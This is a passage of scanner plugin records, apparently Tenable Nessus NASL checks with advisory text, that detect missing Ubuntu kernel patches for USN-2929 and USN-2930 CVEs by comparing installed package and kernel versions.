get_kb_item_or_exit('Host/uname-r');\nvar host_kernel_version = get_kb_item_or_exit('Host/Debian/kernel-version');\nvar host_kernel_base_version = get_kb_item_or_exit('Host/Debian/kernel-base-version');\nvar host_kernel_type = get_kb_item_or_exit('Host/Debian/kernel-type');\nif(empty_or_null(kernel_mappings[os_release][host_kernel_base_version][host_kernel_type])) audit(AUDIT_INST_VER_NOT_VULN, 'kernel ' + host_kernel_release);\n\nvar extra = '';\nvar kernel_fixed_version = kernel_mappings[os_release][host_kernel_base_version][host_kernel_type];\nif (deb_ver_cmp(ver1:host_kernel_version, ver2:kernel_fixed_version) < 0)\n{\n extra = extra + 'Running Kernel level of ' + host_kernel_version + ' does not meet the minimum fixed level of ' + kernel_fixed_version + ' for this advisory.\\n\\n';\n}\n else\n{\n audit(AUDIT_PATCH_INSTALLED, 'Kernel package for USN-2930-2');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n var cve_list = make_list('CVE-2015-7566', 'CVE-2015-8767', 'CVE-2016-0723', 'CVE-2016-2384', 'CVE-2016-2543', 'CVE-2016-2544', 'CVE-2016-2545', 'CVE-2016-2546', 'CVE-2016-2547', 'CVE-2016-2548', 'CVE-2016-2549', 'CVE-2016-2782', 'CVE-2016-3134', 'CVE-2016-3135');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-2930-2');\n }\n else\n {\n extra = extra + ksplice_reporting_text();\n }\n}\nif (extra) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-24T15:00:51", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2929-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-7833", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2929-2.NASL", "href": "https://www.tenable.com/plugins/nessus/89933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2929-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89933);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n script_xref(name:\"USN\", value:\"2929-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2929-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2929-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2929-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-83-generic\", pkgver:\"3.13.0-83.127~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-83-generic-lpae\", pkgver:\"3.13.0-83.127~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:36:11", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Linux kernel vulnerabilities (USN-2929-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-7833", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134"], "modified": "2023-10-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc-e500", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc-e500mc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc64-emb", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc64-smp", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts"], "id": "UBUNTU_USN-2929-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2929-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89932);\n script_version(\"2.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\n \"CVE-2013-4312\",\n \"CVE-2015-7566\",\n \"CVE-2015-7833\",\n \"CVE-2016-0723\",\n \"CVE-2016-2384\",\n \"CVE-2016-2543\",\n \"CVE-2016-2544\",\n \"CVE-2016-2545\",\n \"CVE-2016-2546\",\n \"CVE-2016-2547\",\n \"CVE-2016-2548\",\n \"CVE-2016-2549\",\n \"CVE-2016-2782\",\n \"CVE-2016-3134\"\n );\n script_xref(name:\"USN\", value:\"2929-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Linux kernel vulnerabilities (USN-2929-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2929-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3134\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc-e500\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc-e500mc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc64-emb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13.0-83-powerpc64-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar kernel_mappings = {\n '14.04': {\n '3.13.0': {\n 'generic': '3.13.0-83',\n 'generic-lpae': '3.13.0-83',\n 'lowlatency': '3.13.0-83',\n 'powerpc-e500': '3.13.0-83',\n 'powerpc-e500mc': '3.13.0-83',\n 'powerpc-smp': '3.13.0-83',\n 'powerpc64-emb': '3.13.0-83',\n 'powerpc64-smp': '3.13.0-83'\n }\n }\n};\n\nvar host_kernel_release = get_kb_item_or_exit('Host/uname-r');\nvar host_kernel_version = get_kb_item_or_exit('Host/Debian/kernel-version');\nvar host_kernel_base_version = get_kb_item_or_exit('Host/Debian/kernel-base-version');\nvar host_kernel_type = get_kb_item_or_exit('Host/Debian/kernel-type');\nif(empty_or_null(kernel_mappings[os_release][host_kernel_base_version][host_kernel_type])) audit(AUDIT_INST_VER_NOT_VULN, 'kernel ' + host_kernel_release);\n\nvar extra = '';\nvar kernel_fixed_version = kernel_mappings[os_release][host_kernel_base_version][host_kernel_type];\nif (deb_ver_cmp(ver1:host_kernel_version, ver2:kernel_fixed_version) < 0)\n{\n extra = extra + 'Running Kernel level of ' + host_kernel_version + ' does not meet the minimum fixed level of ' + kernel_fixed_version + ' for this advisory.\\n\\n';\n}\n else\n{\n audit(AUDIT_PATCH_INSTALLED, 'Kernel package for USN-2929-1');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n var cve_list = make_list('CVE-2013-4312', 'CVE-2015-7566', 'CVE-2015-7833', 'CVE-2016-0723', 'CVE-2016-2384', 'CVE-2016-2543', 'CVE-2016-2544', 'CVE-2016-2545', 'CVE-2016-2546', 'CVE-2016-2547', 'CVE-2016-2548', 'CVE-2016-2549', 'CVE-2016-2782', 'CVE-2016-3134');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-2929-1');\n }\n else\n {\n extra = extra + ksplice_reporting_text();\n }\n}\nif (extra) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:35:47", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's translation lookaside buffer (TLB) handling of flush events. A local attacker could use this to cause a denial of service or possibly leak sensitive information. (CVE-2016-2069)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that 